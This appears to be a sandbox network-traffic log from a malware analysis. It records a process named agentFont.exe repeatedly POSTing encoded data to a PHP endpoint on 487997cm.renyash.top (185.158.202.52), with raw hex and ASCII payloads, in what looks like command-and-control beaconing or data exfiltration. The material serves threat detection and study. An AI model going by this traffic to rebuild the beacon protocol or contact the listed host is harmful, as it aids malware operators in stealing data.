                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:27.096729040 CET | 1044 | OUT | Data Raw: 51 52 58 59 51 43 55 5f 59 5f 5b 52 5a 5f 59 51 55 54 54 50 51 58 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QRXYQCU_Y_[RZ_YQUTTPQX[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<=#-$\&=%.-/S%?^'.#%"$,1Q=$^"=(:&X"#\.<
                                                                                  Jan 1, 2025 11:28:27.379924059 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:27.509948015 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:23 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  88 | 192.168.2.4 | 50011 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:27.838180065 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  89 | 192.168.2.4 | 50016 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:27.951567888 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:28.299681902 CET | 1044 | OUT | Data Raw: 54 5a 5d 5f 54 41 55 5f 59 5f 5b 52 5a 5c 59 5d 55 51 54 59 51 50 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TZ]_TAU_Y_[RZ\Y]UQTYQP[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.Z+T: >;19.,&>3Z&_"5)W3Y6=$"[6)*&X"#\.0
                                                                                  Jan 1, 2025 11:28:28.588006020 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:28.718091965 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  90 | 192.168.2.4 | 50023 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:28.848246098 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1032
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:29.205919027 CET | 1032 | OUT | Data Raw: 54 57 5d 5c 54 4b 50 5a 59 5f 5b 52 5a 5a 59 55 55 52 54 5d 51 59 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TW]\TKPZY_[RZZYUURT]QY[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.Z?%4=8[1&,-7&<='<95:0.=B8!>*<:&X"#\.<
                                                                                  Jan 1, 2025 11:28:29.521929026 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:29.659703970 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:26 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  91 | 192.168.2.4 | 50029 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:29.801613092 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:30.159755945 CET | 1044 | OUT | Data Raw: 54 57 5d 5f 54 44 50 5a 59 5f 5b 52 5a 52 59 50 55 51 54 5e 51 5d 5b 5e 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TW]_TDPZY_[RZRYPUQT^Q][^^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<>7>;26@.=+V2<2'>Y"1V05W=3Z6"+&X"#\.
                                                                                  Jan 1, 2025 11:28:30.446765900 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:30.581449986 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  92 | 192.168.2.4 | 50035 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:30.738758087 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:31.096575975 CET | 1044 | OUT | Data Raw: 54 56 5d 5c 51 40 50 5a 59 5f 5b 52 5a 5b 59 5d 55 5f 54 50 51 5a 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TV]\Q@PZY_[RZ[Y]U_TPQZ[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?)#.(X%-:=#W2?-'>!.$?P)'3"=X?&X"#\.,
                                                                                  Jan 1, 2025 11:28:31.395595074 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:31.531768084 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  93 | 192.168.2.4 | 50041 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:31.661134958 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:32.018491983 CET | 1044 | OUT | Data Raw: 54 56 58 5f 51 44 55 5e 59 5f 5b 52 5a 52 59 5c 55 56 54 58 51 5c 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TVX_QDU^Y_[RZRY\UVTXQ\[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.]<&# 29->$%Y>\',-5C!W'/%*4#>9(&X"#\.
                                                                                  Jan 1, 2025 11:28:32.298367977 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:32.426300049 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:28 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  94 | 192.168.2.4 | 50047 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:32.555931091 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:32.909048080 CET | 1040 | OUT | Data Raw: 54 55 5d 5b 51 43 55 5e 59 5f 5b 52 5a 5a 59 51 55 56 54 59 51 5d 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TU][QCU^Y_[RZZYQUVTYQ][]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\+.#-&"E.'1/>^$-"5!U0/"*<6=\?:&X"#\.8


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  95 | 192.168.2.4 | 50049 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:32.933109999 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:33.284051895 CET | 1340 | OUT | Data Raw: 51 57 5d 5a 51 46 55 59 59 5f 5b 52 5a 52 59 50 55 5f 54 50 51 50 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QW]ZQFUYY_[RZRYPU_TPQP[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-+5V"= X2"-=;R&/>Y'/>_69$2>7?^"=2<:&X"#\.
                                                                                  Jan 1, 2025 11:28:33.573587894 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:33.706844091 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 24 01 3e 1f 2c 01 30 2b 26 08 33 00 30 09 3f 33 2a 58 38 02 0f 1f 25 14 30 1d 29 23 2b 53 28 2b 26 5d 2a 3d 0d 01 25 21 30 12 32 0f 2a 51 00 1c 23 1e 28 15 0e 02 3c 16 21 0e 3e 32 3f 5d 3c 02 3f 58 36 2a 23 57 33 2b 03 0a 33 3d 3b 11 3c 06 23 0f 2f 26 2b 5c 2c 0d 0d 5e 30 1c 2f 52 09 14 22 04 3d 1d 09 55 25 0c 39 02 26 33 28 05 22 06 3c 0c 34 32 21 1d 20 30 3b 58 3c 2e 27 58 20 32 2e 5c 25 12 08 45 3e 2d 02 0f 36 3e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: $>,0+&30?3*X8%0)#+S(+&]*=%!02*Q#(<!>2?]<?X6*#W3+3=;<#/&+\,^0/R"=U%9&3("<42! 0;X<.'X 2.\%E>-6>#T,#V6]Q


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  96 | 192.168.2.4 | 50054 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:33.053991079 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:33.409028053 CET | 1044 | OUT | Data Raw: 51 57 5d 5f 54 44 50 5e 59 5f 5b 52 5a 52 59 54 55 54 54 5a 51 5d 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QW]_TDP^Y_[RZRYTUTTZQ][Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?"".$%=C.+S$<1%/&["6-Q'/P>'<"=)*&X"#\.
                                                                                  Jan 1, 2025 11:28:33.688184977 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:33.817482948 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  97 | 192.168.2.4 | 50060 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:33.941051960 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:34.299662113 CET | 1044 | OUT | Data Raw: 51 52 58 5c 54 40 55 5b 59 5f 5b 52 5a 5b 59 51 55 53 54 50 51 50 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QRX\T@U[Y_[RZ[YQUSTPQP[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(T!T#$Z%."B.[$$?2\'95%,1Q)4+"5X+:&X"#\.,
                                                                                  Jan 1, 2025 11:28:34.586559057 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:34.751729012 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:31 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  98 | 192.168.2.4 | 50066 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:34.883841991 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:35.237279892 CET | 1044 | OUT | request body
                                                                                  Jan 1, 2025 11:28:35.529567003 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:35.664031982 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  99 | 192.168.2.4 | 50072 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:35.786175013 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:36.143436909 CET | 1044 | OUT | request body
                                                                                  Jan 1, 2025 11:28:36.431828022 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:36.563802958 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  100 | 192.168.2.4 | 50079 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:36.731296062 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:37.080960989 CET | 1040 | OUT | request body
                                                                                  Jan 1, 2025 11:28:37.365361929 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:37.493591070 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  101 | 192.168.2.4 | 50089 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:37.690449953 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:38.050374031 CET | 1044 | OUT | request body
                                                                                  Jan 1, 2025 11:28:38.324080944 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:38.453495979 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  102 | 192.168.2.4 | 50095 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:38.581681013 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  103 | 192.168.2.4 | 50096 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:38.743269920 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:39.096605062 CET | 1340 | OUT | request body
